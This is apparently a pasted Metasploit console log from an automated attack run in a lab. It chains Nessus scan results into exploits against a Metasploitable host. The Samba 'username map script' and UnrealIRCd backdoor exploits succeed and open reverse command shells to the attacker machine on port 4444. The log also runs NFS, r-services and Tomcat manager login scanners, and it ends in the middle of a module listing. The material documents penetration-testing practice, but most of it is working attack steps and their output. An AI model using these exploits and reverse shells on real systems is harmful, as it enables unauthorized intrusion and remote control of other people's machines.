Untitled
a guest
May 31st, 2016
Spooling to file /root/Bureau/output...
Deleted workspace: test
Added workspace: test
Workspace: test
exec: service nessusd start
Connecting to https://localhost:8834/ as admin
User admin authenticated successfully.
RHOST => 192.168.26.134
RHOSTS => 192.168.26.134
Scan created
Scan launched
Scan completed
Exporting scan
The export file ID for scan ID 779 is 1546865377
Checking export status...
The status of scan ID 779 export is ready
Importing scan results to the database...
Importing data of 192.168.26.134
Done

CVE list
CVE-1999-0632
CVE-1999-0554
CVE-1999-0524
CVE-2007-1858
CVE-2008-5161
CVE-2014-3566
CVE-2015-0204
CVE-2015-0204
CVE-2015-4000
CVE-2015-4000
CVE-2013-2566
CVE-2015-2808
CVE-2016-0800
CVE-2011-0411
CVE-2011-1430
CVE-2011-1431
CVE-2011-1432
CVE-2011-1506
CVE-2011-2165
CVE-2016-2118
CVE-2016-2118
CVE-2007-2447
CVE-2007-2447
CVE-1999-0170
CVE-1999-0211
CVE-1999-0554
CVE-2003-1567
CVE-2004-2320
CVE-2010-0386
CVE-2012-0053
CVE-1999-0497
CVE-1999-0651
CVE-1999-0651
CVE-2010-2075
CVE-2012-6392
CVE-2008-0166
CVE-2008-0166
CVE-2009-3099
CVE-2009-3548
CVE-2010-0557
CVE-2010-4094

*++*Exploit auxiliary/scanner/http/ssl_version for CVE 2014-3566

       Name: HTTP SSL/TLS Version Detection (POODLE scanner)
     Module: auxiliary/scanner/http/ssl_version
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-10-14

Provided by:
  todb

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS      192.168.26.134   yes       The target address range or CIDR identifier
  RPORT       443              yes       The target port
  SSL         true             no        Negotiate SSL/TLS for outgoing connections
  SSLVersion  Auto             no        Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, SSL2, SSL3, SSL23, TLS, TLS1, TLS1.1, TLS1.2)
  THREADS     1                yes       The number of concurrent threads
  VHOST                        no        HTTP server virtual host

Description:
  Check if an HTTP server supports a given version of SSL/TLS. If a web server can successfully establish an SSLv3 session, it is likely to be vulnerable to the POODLE attack described on October 14, 2014, as a patch against the attack is unlikely.

References:
  http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html
  http://www.osvdb.org/113251
  http://cvedetails.com/cve/2014-3566/

Auxiliary module running as background job
Scanned 1 of 1 hosts (100% complete)

*++*Exploit exploit/multi/samba/usermap_script for CVE 2007-2447

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.26.134   yes       The target address
  RPORT  139              yes       The target port

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

References:
  http://cvedetails.com/cve/2007-2447/
  http://www.osvdb.org/34700
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html

Exploit running as background job.
Started reverse TCP double handler on 192.168.26.207:4444
Accepted the first client connection...
Accepted the second client connection...
Command: echo fQqu2RdPJiFFHjbL;
Writing to socket A
Writing to socket B
Reading from sockets...
Reading from socket B
B: "fQqu2RdPJiFFHjbL\r\n"
Matching...
A is input...
Command shell session 1 opened (192.168.26.207:4444 -> 192.168.26.134:55144) at 2016-05-26 12:29:58 +0100

*++*Exploit auxiliary/scanner/nfs/nfsmount for CVE 1999-0170

       Name: NFS Mount Scanner
     Module: auxiliary/scanner/nfs/nfsmount
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  tebo

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PROTOCOL  udp              yes       The protocol to use (Accepted: udp, tcp)
  RHOSTS    192.168.26.134   yes       The target address range or CIDR identifier
  RPORT     111              yes       The target port
  THREADS   1                yes       The number of concurrent threads

Description:
  This module scans NFS mounts and their permissions.
References:
  http://cvedetails.com/cve/1999-0170/
  http://www.ietf.org/rfc/rfc1094.txt

Auxiliary module running as background job
192.168.26.134:111 - 192.168.26.134 NFS Export: /
[*] 192.168.26.134:111 - Scanned 1 of 1 hosts (100% complete)

*++*Exploit auxiliary/scanner/rservices/rexec_login for CVE 1999-0651

       Name: rexec Authentication Scanner
     Module: auxiliary/scanner/rservices/rexec_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  jduck

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   false            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false            no        Add all passwords in the current database to the list
  DB_ALL_USERS      false            no        Add all users in the current database to the list
  ENABLE_STDERR     false            yes       Enables connecting the stderr port
  PASSWORD                           no        A specific password to authenticate with
  PASS_FILE                          no        File containing passwords, one per line
  RHOSTS            192.168.26.134   yes       The target address range or CIDR identifier
  RPORT             512              yes       The target port
  STDERR_PORT                        no        The port to listen on for stderr
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           1                yes       The number of concurrent threads
  USERNAME                           no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false            no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           true             yes       Whether to print output for all attempts

Description:
  This module will test an rexec service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).

References:
  http://cvedetails.com/cve/1999-0651/
  http://cvedetails.com/cve/1999-0502/

Auxiliary module running as background job
192.168.26.134:512 - 192.168.26.134:512 - Starting rexec sweep
192.168.26.134:512 - Scanned 1 of 1 hosts (100% complete)

*++*Exploit auxiliary/scanner/rservices/rlogin_login for CVE 1999-0651

       Name: rlogin Authentication Scanner
     Module: auxiliary/scanner/rservices/rlogin_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  jduck

Basic options:
  Name              Current Setting                                                          Required  Description
  ----              ---------------                                                          --------  -----------
  BLANK_PASSWORDS   false                                                                    no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                        yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                    no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                    no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                    no        Add all users in the current database to the list
  FROMUSER                                                                                   no        The username to login from
  FROMUSER_FILE     /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt  no        File containing from usernames, one per line
  PASSWORD                                                                                   no        A specific password to authenticate with
  PASS_FILE                                                                                  no        File containing passwords, one per line
  RHOSTS            192.168.26.134                                                           yes       The target address range or CIDR identifier
  RPORT             513                                                                      yes       The target port
  SPEED             9600                                                                     yes       The terminal speed desired
  STOP_ON_SUCCESS   false                                                                    yes       Stop guessing when a credential works for a host
  TERM              vt100                                                                    yes       The terminal type desired
  THREADS           1                                                                        yes       The number of concurrent threads
  USERNAME                                                                                   no        A specific username to authenticate as
  USERPASS_FILE                                                                              no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                    no        Try the username as the password for all users
  USER_FILE                                                                                  no        File containing usernames, one per line
  VERBOSE           true                                                                     yes       Whether to print output for all attempts

Description:
  This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).

References:
  http://cvedetails.com/cve/1999-0651/
  http://cvedetails.com/cve/1999-0502/

Auxiliary module running as background job
192.168.26.134:513 - 192.168.26.134:513 - Starting rlogin sweep
192.168.26.134:513 - Scanned 1 of 1 hosts (100% complete)

*++*Exploit auxiliary/scanner/rservices/rsh_login for CVE 1999-0651

       Name: rsh Authentication Scanner
     Module: auxiliary/scanner/rservices/rsh_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  jduck

Basic options:
  Name              Current Setting                                                          Required  Description
  ----              ---------------                                                          --------  -----------
  BLANK_PASSWORDS   false                                                                    no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                        yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                    no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                    no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                    no        Add all users in the current database to the list
  ENABLE_STDERR     false                                                                    yes       Enables connecting the stderr port
  FROMUSER                                                                                   no        The username to login from
  FROMUSER_FILE     /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt  no        File containing from usernames, one per line
  PASSWORD                                                                                   no        A specific password to authenticate with
  PASS_FILE                                                                                  no        File containing passwords, one per line
  RHOSTS            192.168.26.134                                                           yes       The target address range or CIDR identifier
  RPORT             514                                                                      yes       The target port
  STOP_ON_SUCCESS   false                                                                    yes       Stop guessing when a credential works for a host
  THREADS           1                                                                        yes       The number of concurrent threads
  USERNAME                                                                                   no        A specific username to authenticate as
  USERPASS_FILE                                                                              no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                    no        Try the username as the password for all users
  USER_FILE                                                                                  no        File containing usernames, one per line
  VERBOSE           true                                                                     yes       Whether to print output for all attempts

Description:
  This module will test a shell (rsh) service on a range of machines and report successful logins.
  NOTE: This module requires access to bind to privileged ports (below 1024).

References:
  http://cvedetails.com/cve/1999-0651/
  http://cvedetails.com/cve/1999-0502/

Auxiliary module running as background job
192.168.26.134:514 - 192.168.26.134:514 - Starting rsh sweep
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'root'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'daemon'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'bin'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'nobody'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from '+'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'guest'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'mail'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - Scanned 1 of 1 hosts (100% complete)

*++*Exploit exploit/unix/irc/unreal_ircd_3281_backdoor for CVE 2010-2075

       Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
     Module: exploit/unix/irc/unreal_ircd_3281_backdoor
   Platform: Unix
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-06-12

Provided by:
  hdm

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.26.134   yes       The target address
  RPORT  6667             yes       The target port

Payload information:
  Space: 1024

Description:
  This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

References:
  http://cvedetails.com/cve/2010-2075/
  http://www.osvdb.org/65445
  http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Exploit running as background job.
Started reverse TCP double handler on 192.168.26.207:4444
192.168.26.134:6667 - Connected to 192.168.26.134:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached)
192.168.26.134:6667 - Sending backdoor command...
Accepted the first client connection...
Accepted the second client connection...
Command: echo r5ImdFHNBj1Bph2K;
Writing to socket A
Writing to socket B
Reading from sockets...
Reading from socket B
B: "r5ImdFHNBj1Bph2K\r\n"
Matching...
A is input...
Command shell session 2 opened (192.168.26.207:4444 -> 192.168.26.134:55146) at 2016-05-26 12:30:35 +0100

*++*Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2009-3548

       Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution
     Module: exploit/multi/http/tomcat_mgr_deploy
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Java Universal
  2   Windows Universal
  3   Linux x86

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST     192.168.26.134   yes       The target address
  RPORT     80               yes       The target port
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME                   no        The username to authenticate as
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit running as background job.
Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.

*++*Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2009-3548

       Name: Apache Tomcat Manager Authenticated Upload Code Execution
     Module: exploit/multi/http/tomcat_mgr_upload
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  rangercha

Available targets:
  Id  Name
  --  ----
  0   Java Universal
  1   Windows Universal
  2   Linux x86

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        The password for the specified username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      192.168.26.134   yes       The target address
  RPORT      80               yes       The target port
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
  USERNAME                    no        The username to authenticate as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit running as background job.
Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.

*++*Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2009-3548

       Name: Tomcat Application Manager Login Utility
     Module: auxiliary/scanner/http/tomcat_mgr_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  MC
  Matteo Cantoni
  jduck

Basic options:
  Name              Current Setting                                                                 Required  Description
  ----              ---------------                                                                 --------  -----------
  BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
  PASSWORD                                                                                          no        A specific password to authenticate with
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS            192.168.26.134                                                                  yes       The target address range or CIDR identifier
  RPORT             8080                                                                            yes       The target port
  SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
  STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
  TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
  THREADS           1                                                                               yes       The number of concurrent threads
  USERNAME                                                                                          no        A specific username to authenticate as
  USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                           no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
  VERBOSE           true                                                                            yes       Whether to print output for all attempts
  VHOST                                                                                             no        HTTP server virtual host

Description:
  This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://www.securityfocus.com/bid/37086
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
  http://www.zerodayinitiative.com/advisories/ZDI-09-085
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/
  http://cvedetails.com/cve/1999-0502/

Auxiliary module running as background job
192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080).
Scanned 1 of 1 hosts (100% complete)

*++*Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2010-0557

       Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution
     Module: exploit/multi/http/tomcat_mgr_deploy
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Java Universal
  2   Windows Universal
  3   Linux x86

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST     192.168.26.134   yes       The target address
  RPORT     80               yes       The target port
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME                   no        The username to authenticate as
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit running as background job.
Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.

*++*Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2010-0557

       Name: Apache Tomcat Manager Authenticated Upload Code Execution
     Module: exploit/multi/http/tomcat_mgr_upload
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  rangercha

Available targets:
  Id  Name
  --  ----
  0   Java Universal
  1   Windows Universal
  2   Linux x86

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        The password for the specified username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      192.168.26.134   yes       The target address
  RPORT      80               yes       The target port
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
  USERNAME                    no        The username to authenticate as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit running as background job.
Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
*++*Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2010-0557

       Name: Tomcat Application Manager Login Utility
     Module: auxiliary/scanner/http/tomcat_mgr_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  MC
  Matteo Cantoni
  jduck

Basic options:
  Name              Current Setting                                                                 Required  Description
  ----              ---------------                                                                 --------  -----------
  BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
  PASSWORD                                                                                          no        A specific password to authenticate with
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS            192.168.26.134                                                                  yes       The target address range or CIDR identifier
  RPORT             8080                                                                            yes       The target port
  SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
  STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
  TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
  THREADS           1                                                                               yes       The number of concurrent threads
  USERNAME                                                                                          no        A specific username to authenticate as
  USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                           no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
  VERBOSE           true                                                                            yes       Whether to print output for all attempts
  VHOST                                                                                             no        HTTP server virtual host

Description:
  This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://www.securityfocus.com/bid/37086
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
  http://www.zerodayinitiative.com/advisories/ZDI-09-085
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/
  http://cvedetails.com/cve/1999-0502/

Auxiliary module running as background job
192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080).
Scanned 1 of 1 hosts (100% complete)

*++*Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2010-4094

       Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution
     Module: exploit/multi/http/tomcat_mgr_deploy
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Java Universal
  2   Windows Universal
  3   Linux x86

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST     192.168.26.134   yes       The target address
  RPORT     80               yes       The target port
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME                   no        The username to authenticate as
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit running as background job.
Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.

*++*Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2010-4094

       Name: Apache Tomcat Manager Authenticated Upload Code Execution
     Module: exploit/multi/http/tomcat_mgr_upload
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  rangercha

Available targets:
  Id  Name
  --  ----
  0   Java Universal
  1   Windows Universal
  2   Linux x86

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        The password for the specified username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      192.168.26.134   yes       The target address
  RPORT      80               yes       The target port
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
  USERNAME                    no        The username to authenticate as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
